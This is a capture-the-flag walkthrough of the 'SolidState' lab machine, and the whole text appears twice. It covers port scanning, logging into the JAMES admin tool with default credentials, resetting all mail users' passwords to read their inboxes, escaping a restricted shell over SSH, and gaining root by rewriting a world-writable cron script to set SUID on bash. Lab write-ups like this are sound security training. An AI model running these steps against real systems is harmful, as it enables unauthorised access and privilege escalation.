SolidState

Last updated 2 years ago

Was this helpful?

SolidState

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.51 -oN allPorts

-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5 insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oN save the scan result into a file, in this case the allports file.

# Nmap 7.92 scan initiated Tue Mar 22 13:12:31 2022 as: nmap -sS -p- -T5 --min-rate 5000 -n -Pn -oN allPorts 10.10.10.51
Warning: 10.10.10.51 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.51
Host is up (0.056s latency).
Not shown: 65529 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
80/tcp   open  http
110/tcp  open  pop3
119/tcp  open  nntp
4555/tcp open  rsip

# Nmap done at Tue Mar 22 13:12:47 2022 -- 1 IP address (1 host up) scanned in 16.81 seconds

As we see, only ports 22, 25, 80, 110, 119 and 4555 are open.

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p22,25,80,110,119,4555 10.10.10.51 -oN targeted

-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oN save the scan result into file, in this case the targeted file.

# Nmap 7.92 scan initiated Tue Mar 22 13:13:23 2022 as: nmap -sCV -p22,25,80,110,119,4555 -oN targeted 10.10.10.51
Nmap scan report for 10.10.10.51
Host is up (0.046s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp   open  smtp    JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.19 [10.10.14.19])
80/tcp   open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Home - Solid State Security
|_http-server-header: Apache/2.4.25 (Debian)
110/tcp  open  pop3    JAMES pop3d 2.3.2
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
119/tcp  open  nntp    JAMES nntpd (posting ok)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
4555/tcp open  rsip?
| fingerprint-strings: 
|   GenericLines: 
|     JAMES Remote Administration Tool 2.3.2
|     Please enter your login and password
|     Login id:
|     Password:
|     Login failed for 
|_    Login id:
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4555-TCP:V=7.92%I=7%D=3/22%Time=6239BD70%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,7C,"JAMES\x20Remote\x20Administration\x20Tool\x202\.3\.2\nPl
SF:ease\x20enter\x20your\x20login\x20and\x20password\nLogin\x20id:\nPasswo
SF:rd:\nLogin\x20failed\x20for\x20\nLogin\x20id:\n");
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Mar 22 13:17:27 2022 -- 1 IP address (1 host up) scanned in 244.15 seconds

Exploitation

As we see, nmap reported that port 4555 is open, which host the JAMES Remote Administration Tool 2.3.2. If you do your own research, you'll find that the default credentials for the administration tool are the user root, and the password root. Let's try to connect to that server with these credentials.

nc 10.10.10.51 4555

JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands

Let's see which commands we can execute.

help

Currently implemented commands:
help                                    display this help
listusers                               display existing accounts
countusers                              display the number of existing accounts
adduser [username] [password]           add a new user
verify [username]                       verify if specified user exist
deluser [username]                      delete existing user
setpassword [username] [password]       sets a user's password
setalias [user] [alias]                 locally forwards all email for 'user' to 'alias'
showalias [username]                    shows a user's current email alias
unsetalias [user]                       unsets an alias for 'user'
setforwarding [username] [emailaddress] forwards a user's email to another email address
showforwarding [username]               shows a user's current email forwarding
unsetforwarding [username]              removes a forward
user [repositoryname]                   change to another user repository
shutdown                                kills the current JVM (convenient when James is run as a daemon)
quit                                    close connection

With the listusers command, we can see a list of users.

listusers

Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin

We can also change the password of any user. The idea here is to change the password of every user and check their email inbox looking for any emails. We can change the passwords with the setpassword command.

setpassword james james123
Password for james reset
setpassword thomas thomas123
Password for thomas reset
setpassword john john123
Password for john reset
setpassword mindy mindy123
Password for mindy reset
setpassword mailadmin mailadmin123
Password for mailadmin reset

Now let's log in with each user on port 110, which contains the pop3 server.

telnet 10.10.10.51 110

Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready

If we log in with the user james, we'll see that there is are no emails. We can list the emails with the list command.

user james
+OK
pass james123
+OK Welcome james
list
+OK 0 0
.
quit
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.

If we log in with the user thomas, we won't see any emails either.

telnet 10.10.10.51 110

Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 
user thomas
+OK
pass thomas123
+OK Welcome thomas
list
+OK 0 0
.
quit
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.

If we log in with the user john, we'll see there is one email. We can see that email with the RETR command.

telnet 10.10.10.51 110

Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 
user john
+OK
pass john123
+OK Welcome john
list
+OK 1 743
1 743
.
retr 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <9564574.1.1503422198108.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: john@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <john@localhost>;
          Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
From: mailadmin@localhost
Subject: New Hires access
John, 

Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.

Thank you in advance.

Respectfully,
James

.
quit
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.

The email says that the john user has to send the mindy user a temporary SSH password. Let's look at the inbox of the mindy user.

telnet 10.10.10.51 110

Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 
user mindy
+OK
pass mindy123
+OK Welcome mindy
list
+OK 2 1945
1 1109
2 836
.
retr 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
From: mailadmin@localhost
Subject: Welcome

Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.

We are looking forward to you joining our team and your success at Solid State Security. 

Respectfully,
James
.
retr 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,


Here are your ssh credentials to access the system. Remember to reset your password after your first login. 
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path. 

username: mindy
pass: P@55W0rd1!2@

Respectfully,
James

.
quit
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.

And there are two emails. The first one is informative, but the second one has some valid SSH credentials, mindy/P@55W0rd1!2@. Let's use those to log in to the SSH server. Then we could grab the user flag.

sshpass -p 'P@55W0rd1!2@' ssh mindy@10.10.10.51

Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Mar 22 11:29:46 2022 from 10.10.14.19
mindy@solidstate:~$ cat user.txt
0510e71c2e8c9cb333b36a38080d0dc2

The problem is that, if we see the PATH variable, we'll see that we can only execute binaries under the /home/mindy/bin directory, which are the cat, env, and ls binaries.

echo $PATH

/home/mindy/bin

ls -l $PATH

total 0
lrwxrwxrwx 1 root root 8 Aug 22  2017 cat -> /bin/cat
lrwxrwxrwx 1 root root 8 Aug 22  2017 env -> /bin/env
lrwxrwxrwx 1 root root 7 Aug 22  2017 ls -> /bin/ls

We can get a normal bash shell by adding the command we want to execute at the end of the SSH login command. If we add bash, we'll get a normal bash shell.

ssh mindy@10.10.10.51 bash

mindy@10.10.10.51's password: P@55W0rd1!2@
whoami
mindy
echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/games

Privilege Escalation

First of all, let's set an interactive TTY shell.

script /dev/null -c /bin/bash

Then I press Ctrl+Z and execute the following command on my local machine:

stty raw -echo; fg
reset
Terminal type? xterm

Next, I export a few variables:

export TERM=xterm
export SHELL=bash

Finally, I run the following command in our local machine:

stty size

51 236

And set the proper dimensions in the victim machine:

stty rows 51 columns 236

Let's go to the /dev/shm directory. I made the following bash script, which basically show what commands are being executed on the system in a short period of time.

nano procmon.sh && chmod +x procmon.sh

#!/bin/bash

old_commands=$(ps -eo command)

while true; do
        new_commands=$(ps -eo command)
        diff <(echo "$new_commands") <(echo "$old_commands") | grep "[\>\<]" | grep -v -E "procmon|command"
        old_commands=$new_commands
done

If we executed and wait for a bit, we'll see that the /opt/tmp.py script is being executed.

./procmon.sh

< /usr/sbin/CRON -f
< /bin/sh -c python /opt/tmp.py
< python /opt/tmp.py
> /usr/sbin/CRON -f
> /bin/sh -c python /opt/tmp.py
> python /opt/tmp.py

Let's take a look at it.

ls -l /opt/tmp.py

-rwxrwxrwx 1 root root 105 Aug 22  2017 /opt/tmp.py

As the script is owned by root, and we can modify it, we could change the script so when it is executed by root, the SUID permission will be assigned to the bash binary.

nano /opt/tmp-py

#!/usr/bin/env python
import os
import sys
try:
     os.system('chmod u+s /bin/bash')
except:
     sys.exit()

If we wait, we'll see that the /bin/bash permissions will change.

watch -n 1 ls -l /bin/bash

-rwsr-xr-x 1 root root 1265272 May 15  2017 /bin/bash

Finally, if we execute bash with the owner permissions, all we have to do is reap the harvest and take the root flag.

bash -p

bash-4.4# whoami
root
bash-4.4# cat /root/root.txt 
4f4afb55463c3bc79ab1e906b074953d

Last updated 2 years ago

Was this helpful?

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.51 -oN allPorts

-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5 insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oN save the scan result into a file, in this case the allports file.

# Nmap 7.92 scan initiated Tue Mar 22 13:12:31 2022 as: nmap -sS -p- -T5 --min-rate 5000 -n -Pn -oN allPorts 10.10.10.51
Warning: 10.10.10.51 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.51
Host is up (0.056s latency).
Not shown: 65529 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
80/tcp   open  http
110/tcp  open  pop3
119/tcp  open  nntp
4555/tcp open  rsip

# Nmap done at Tue Mar 22 13:12:47 2022 -- 1 IP address (1 host up) scanned in 16.81 seconds

As we see, only ports 22, 25, 80, 110, 119 and 4555 are open.

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p22,25,80,110,119,4555 10.10.10.51 -oN targeted

-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oN save the scan result into file, in this case the targeted file.

# Nmap 7.92 scan initiated Tue Mar 22 13:13:23 2022 as: nmap -sCV -p22,25,80,110,119,4555 -oN targeted 10.10.10.51
Nmap scan report for 10.10.10.51
Host is up (0.046s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp   open  smtp    JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.19 [10.10.14.19])
80/tcp   open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Home - Solid State Security
|_http-server-header: Apache/2.4.25 (Debian)
110/tcp  open  pop3    JAMES pop3d 2.3.2
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
119/tcp  open  nntp    JAMES nntpd (posting ok)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
4555/tcp open  rsip?
| fingerprint-strings: 
|   GenericLines: 
|     JAMES Remote Administration Tool 2.3.2
|     Please enter your login and password
|     Login id:
|     Password:
|     Login failed for 
|_    Login id:
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4555-TCP:V=7.92%I=7%D=3/22%Time=6239BD70%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,7C,"JAMES\x20Remote\x20Administration\x20Tool\x202\.3\.2\nPl
SF:ease\x20enter\x20your\x20login\x20and\x20password\nLogin\x20id:\nPasswo
SF:rd:\nLogin\x20failed\x20for\x20\nLogin\x20id:\n");
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Mar 22 13:17:27 2022 -- 1 IP address (1 host up) scanned in 244.15 seconds

Exploitation

nc 10.10.10.51 4555

JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands

Let's see which commands we can execute.

help

Currently implemented commands:
help                                    display this help
listusers                               display existing accounts
countusers                              display the number of existing accounts
adduser [username] [password]           add a new user
verify [username]                       verify if specified user exist
deluser [username]                      delete existing user
setpassword [username] [password]       sets a user's password
setalias [user] [alias]                 locally forwards all email for 'user' to 'alias'
showalias [username]                    shows a user's current email alias
unsetalias [user]                       unsets an alias for 'user'
setforwarding [username] [emailaddress] forwards a user's email to another email address
showforwarding [username]               shows a user's current email forwarding
unsetforwarding [username]              removes a forward
user [repositoryname]                   change to another user repository
shutdown                                kills the current JVM (convenient when James is run as a daemon)
quit                                    close connection

With the listusers command, we can see a list of users.

listusers

Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin

setpassword james james123
Password for james reset
setpassword thomas thomas123
Password for thomas reset
setpassword john john123
Password for john reset
setpassword mindy mindy123
Password for mindy reset
setpassword mailadmin mailadmin123
Password for mailadmin reset

Now let's log in with each user on port 110, which contains the pop3 server.

telnet 10.10.10.51 110

Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready

If we log in with the user james, we'll see that there is are no emails. We can list the emails with the list command.

user james
+OK
pass james123
+OK Welcome james
list
+OK 0 0
.
quit
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.

If we log in with the user thomas, we won't see any emails either.

telnet 10.10.10.51 110

Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 
user thomas
+OK
pass thomas123
+OK Welcome thomas
list
+OK 0 0
.
quit
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.

If we log in with the user john, we'll see there is one email. We can see that email with the RETR command.

telnet 10.10.10.51 110

Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 
user john
+OK
pass john123
+OK Welcome john
list
+OK 1 743
1 743
.
retr 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <9564574.1.1503422198108.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: john@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <john@localhost>;
          Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
From: mailadmin@localhost
Subject: New Hires access
John, 

Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.

Thank you in advance.

Respectfully,
James

.
quit
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.

The email says that the john user has to send the mindy user a temporary SSH password. Let's look at the inbox of the mindy user.

telnet 10.10.10.51 110

Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 
user mindy
+OK
pass mindy123
+OK Welcome mindy
list
+OK 2 1945
1 1109
2 836
.
retr 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
From: mailadmin@localhost
Subject: Welcome

Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.

We are looking forward to you joining our team and your success at Solid State Security. 

Respectfully,
James
.
retr 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,


Here are your ssh credentials to access the system. Remember to reset your password after your first login. 
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path. 

username: mindy
pass: P@55W0rd1!2@

Respectfully,
James

.
quit
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.

sshpass -p 'P@55W0rd1!2@' ssh mindy@10.10.10.51

Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Mar 22 11:29:46 2022 from 10.10.14.19
mindy@solidstate:~$ cat user.txt
0510e71c2e8c9cb333b36a38080d0dc2

The problem is that, if we see the PATH variable, we'll see that we can only execute binaries under the /home/mindy/bin directory, which are the cat, env, and ls binaries.

echo $PATH

/home/mindy/bin

ls -l $PATH

total 0
lrwxrwxrwx 1 root root 8 Aug 22  2017 cat -> /bin/cat
lrwxrwxrwx 1 root root 8 Aug 22  2017 env -> /bin/env
lrwxrwxrwx 1 root root 7 Aug 22  2017 ls -> /bin/ls

We can get a normal bash shell by adding the command we want to execute at the end of the SSH login command. If we add bash, we'll get a normal bash shell.

ssh mindy@10.10.10.51 bash

mindy@10.10.10.51's password: P@55W0rd1!2@
whoami
mindy
echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/games

Privilege Escalation

First of all, let's set an interactive TTY shell.

script /dev/null -c /bin/bash

Then I press Ctrl+Z and execute the following command on my local machine:

stty raw -echo; fg
reset
Terminal type? xterm

Next, I export a few variables:

export TERM=xterm
export SHELL=bash

Finally, I run the following command in our local machine:

stty size

51 236

And set the proper dimensions in the victim machine:

stty rows 51 columns 236

Let's go to the /dev/shm directory. I made the following bash script, which basically show what commands are being executed on the system in a short period of time.

nano procmon.sh && chmod +x procmon.sh

#!/bin/bash

old_commands=$(ps -eo command)

while true; do
        new_commands=$(ps -eo command)
        diff <(echo "$new_commands") <(echo "$old_commands") | grep "[\>\<]" | grep -v -E "procmon|command"
        old_commands=$new_commands
done

If we executed and wait for a bit, we'll see that the /opt/tmp.py script is being executed.

./procmon.sh

< /usr/sbin/CRON -f
< /bin/sh -c python /opt/tmp.py
< python /opt/tmp.py
> /usr/sbin/CRON -f
> /bin/sh -c python /opt/tmp.py
> python /opt/tmp.py

Let's take a look at it.

ls -l /opt/tmp.py

-rwxrwxrwx 1 root root 105 Aug 22  2017 /opt/tmp.py

As the script is owned by root, and we can modify it, we could change the script so when it is executed by root, the SUID permission will be assigned to the bash binary.

nano /opt/tmp-py

#!/usr/bin/env python
import os
import sys
try:
     os.system('chmod u+s /bin/bash')
except:
     sys.exit()

If we wait, we'll see that the /bin/bash permissions will change.

watch -n 1 ls -l /bin/bash

-rwsr-xr-x 1 root root 1265272 May 15  2017 /bin/bash

Finally, if we execute bash with the owner permissions, all we have to do is reap the harvest and take the root flag.

bash -p

bash-4.4# whoami
root
bash-4.4# cat /root/root.txt 
4f4afb55463c3bc79ab1e906b074953d